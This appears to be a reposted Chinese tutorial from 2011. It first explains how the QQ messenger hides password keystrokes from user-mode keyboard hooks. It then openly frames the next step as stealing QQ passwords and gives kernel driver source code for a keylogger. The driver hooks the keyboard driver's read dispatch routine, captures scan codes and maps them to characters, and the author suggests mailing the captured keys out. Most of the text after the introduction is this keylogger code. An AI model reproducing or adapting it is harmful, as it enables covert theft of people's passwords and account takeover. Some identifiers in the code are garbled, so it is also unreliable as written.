当前位置: 主页 > 系统综合 > qq相关 > 浅谈QQ密码保护原理 浅谈QQ密码保护原理时间:2011-11-09 13:59来源:未知 整理:寂涯网络 点击:71次QQ 是大家常用的通讯工具之一,所以针对QQ 的盗号木马也非常多,所以腾讯也做出了
相应的反击,2005 年腾讯购买韩国人的技术对QQ的登录对话框的密码输入框采用了驱动程
序进行保护,但是因为设计驱动的安装,导致了软硬件不兼容的问题,07 年的时候也就放
弃了。
目前我们就以 QQ2010 为例,当我们用 WH_ WH_KEYBOARD 的钩子来挂钩系统进行键盘记
录的时候,我们可以试一下密码输入框中是记录不到任何键盘输入的,但是用
WH_KEYBOARD_LL 就可以记录到一些键盘输入,但是认真对比就会发现记录的这些输入是错
的,这是为什么呢?
经过思考和验证,目前的 QQ2010 安装目录中并没有驱动,所以也就不可能将密码保护
进行到驱动级别,问题还是出在 R3 下,QQ 肯定是利用了某些 R3 下的比 WH_ WH_KEYBOARD
更为底层的钩子,或者管理钩子的钩子,有了这个猜测思路就明确了,首先看看 QQ 安装了
哪些钩子吧,我找了一款小工具可以查看卸载钩子,很方便(在附带的文件里)。结果如下
图:
我们可以看到QQ 安装了两个重要的钩子WH_DEBUG和 WHKEYBOARD_LL,原来,WH_DEBUG
可以用来管理很多种类型的钩子,有这么多种:
WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_JOURNALPLAYBACK
WHJOURNALRECORD
WH_KEYBOARD
WH_MOUSE
WH_MSGFILTER
WH_SHELL
WHSYSMSGFILTER
在这些钩子的钩子过程将要被系统调用的时候,系统总是先执行调试钩子的钩子过程。
而 MS的这个调试钩子,允许我们决定是否执行这些被管理的钩子。 当我们卸载掉WH_DEBUG,
WH_ WH_KEYBOARD就能轻松记录下键盘输入,这也就难怪我们安装的WH_KEYBOARD不能到达
目的的原因了,至于为什么 WHKEYBOARD_LL 可以记录到键盘记录呢,很简单因为 WH_DEBUG
不能管理 WHKEYBOARD_LL。
显然 QQ 对钩子的保护已经了解了,那么再来看看我们记录下来什么键盘输入呢?都是
一些不相干的输入,看来 QQ 对我们的键盘钩子还是有另外的招数防备的,他传递给我们的
记录钩子一些假的键盘信息,导致我们钩子记录下来的和我们的键盘输入有很大差异。
到了 QQ2011,我们发现在QQ 的 bin目录下多了两个文件分别是ABL.sys和 PBL.sys这
两个文件是不是内核文件呢?但是我在用本文的修改分发函数的方法验证的时候,还是可以
顺利的截获到键盘记录,实践是检验真理的唯一标准,用 16 进制文件编辑器查看一下,这
两个文件都不是以MZ 开头的,也就是说不是驱动文件,那么就只能说有可能是QQ对自己的
信息的一种保护把。
说了这么多,那么怎样更为简单的盗取 QQ 密码呢?无疑转向了驱动截获键盘记录了,
在驱动级我们可以不用考虑QQ在 R3下用什么复杂严密的方法来保护键盘记录,因为我们的
驱动程序比他更加底层,所以在此我们用修改系统驱动对象的分发函数的方法来截获键盘记
录,下面我们来看看程序。
首先申明一些函数和全局变量,这里就不多说了。
ULONG gC2pKeyCount=0; //全局变量记录IRP个数
extern POBJECT_TYPE IoDriverObjectType;//声明这个函数
PDRIVERDISPATCH OldDispatchRead;//原 IRPMJREAD函数的入口地址
然后我们来写入口函数。当一个请求(IRP)来的时候,说明 Windows 要从键盘驱动读
取一个扫描码值,我们要获得的是按下键的扫描码的值,所以就只能把这个请求发下去在看
返回的这个值是多少,于是我们修改IRP的完成函数,使得IRP 完成以后调用我们的函数,
这个实现起来还是很容易的,只要用我们定义的一个函数地址替换掉原来的额完成函数的地
址就可以了。
另外一个问题是,我们的分发函数要实现什么功能呢?记录邮件发送?这个就随大家的
意思了,本文为了简便只是做了简单的的打印。打印完之后呢?当然是要调用原来的完成函
数来实现他原本的功能了,否则没有IRP的返回,系统很容易就崩溃了。
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING
RegistryPath) //入口函数
{
PDRIVER_OBJECT kbdDriverObject;
UNICODE_STRING uniNtNameString;
NTSTATUS status=NULL;
NTSTATUS ObReferenceObjectByName(PUNICODESTRING ObjectName,
//这个函数文档里没有,但申明一下就可以直接使用
ULONG Attributes,
PACCESS_STATE AccessState,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID ParseContext,
PVOID *Object);
RtlInitUnicodeString(&uniNtNameString,KBD_DRIVER_NAME);
//初始化为0
status=ObReferenceObjectByName(
//得到并打开设备
&uniNtNameString,
OBJ_CASE_INSENSITIVE,
NULL,
0,
IoDriverObjectType,
KernelMode,
NULL,
&kbdDriverObject);
if(!NT_SUCCESS(status))
{
DbgPrint("cannot get the kbd object\n");
return STATUS_UNSUCCESSFUL;
}
else
{
ULONG i;
//PDRIVER_DISPATCH OldDispatchFunctions[IRP_MJ_MAXIMUM_FUNCTION+1];
OldDispatchRead = kbdDriverObject->MajorFunction[IRP_MJ_READ];// 保存原
IRP_MJ_READ函数的入口地址
InterlockedExchangePointer(&kbdDriverObject->MajorFunction[IRP_MJ_READ],New
DispatchRead);//替换为自定义的新分发函数的地址
ObDereferenceObject(kbdDriverObject); //不要忘记解除调用
}
DriverObject->DriverUnload=DriverUnload;
return STATUS_SUCCESS;
}
然后我们来写我们自己的分发函数,在这个分发函数中,我们要定义一个完成函数,以
便请求完成的时候,能够调用我们的完成函数。
NTSTATUS NewDispatchRead(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp) //
新的分发函数
{
PIO_STACK_LOCATION irpSp; //以
下的内容都是新分发函数的新增内容
irpSp = IoGetCurrentIrpStackLocation(Irp);
irpSp->Control =
SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR|SL_INVOKE_ON_CANCEL;
//保留原来的完成函数,如果有的话
irpSp->Context = irpSp->CompletionRoutine;
irpSp->CompletionRoutine = (PIO_COMPLETION_ROUTINE)OnReadCompletion; //
这个是完成函数
return OldDispatchRead(pDeviceObject,Irp); //调用原来的分
发函数,完成应该有的内容
}
最后我们就要为我们的完成函数写自己的代码了,这里我只做简单的打印,打印出的是
读取键盘输入,但要注意的是键盘按下和弹起都有扫描码,打印其中之一就行。
NTSTATUS OnReadCompletion(IN PDRIVER_OBJECT DriverObject,
IN PIRP Irp,
IN PVOID Context
) //完成函数
{
PIO_STACK_LOCATION IrpSp;
PUCHAR buf=NULL;
IrpSp=IoGetCurrentIrpStackLocation(Irp);
if(NT_SUCCESS(Irp->IoStatus.Status))
{
buf=Irp->AssociatedIrp.SystemBuffer;
MyKeyPrint((UCHAR)buf[2]); //字符打印函数
}
if(Irp->PendingReturned)
{
IoMarkIrpPending(Irp);
}
return Irp->IoStatus.Status;
}
这里要说明的是,由于编辑要我把扫描码转化成字符输出来,这还废了我一些劲,因为
在内核态下没有直接可用的函数接口转换扫描码成为ASCII 码。于是只能自己动手写这还是
挺伤脑经的。这里用了直接定址法将字符放在一个数组中,为了不越界,定义一个大一点的
数组。
UCHAR
asciiTbl[256]={'0','0','1','2','3','4','5','6','7','8','9','0','0','0','0',
'0','q','w','e','r','t',
'y','u','i','o','p','0','0','0','0','a','s','d','f','g','h','j','k','l','0'
,'0',
'0','0','0','z','x','c','v','b','n','m','0','0','0','0','0','0','0','0','0'
,'0',
'0','0','0','0','0','0','0','0','0','0','7','8','9','0','4','5','6','0','1'
,'2',
'3','0'
};
这里为了简便,我只写出了部分键盘扫描码和ASCII的转换,共有键盘字符键,数字键,
小键盘键。并且也没有考虑shift,caps 键对字符的影响,其他的的按键转换同理,当检测
到有上述两个键输入时,将字符大写就可以。为了节省篇幅,就不多说了。字符转换函数如
下:
void _stdcall MyKeyPrint(UCHAR sch) //字符打印函数
{
if(gC2pKeyCount%2==1)
{
UCHAR ch=0;
int a=0;
a=(int)sch;
ch=asciiTbl[a];
DbgPrint("%C \n",ch);
}
}
至于驱动文件的安装,这里就不多说了,到此也就结束了。这里存在一个稳定性的小问
题,在新分发函数替换过程中,一部分分发函数已经被替换,此时刚好有连续的几个 IRP
需要处理中间具有相关性,这种情况下可能破坏他们的关联,但是这种问题的几率也是相当
小,是小概率事件,不予考虑。经本人测试可用,环境为Windows XP SP2。
转自寂涯网络 www.jybase
原帖地址 http://www.jybase/qqxiangguan/20111109594.html
更多推荐
浅谈QQ密码保护原理
发布评论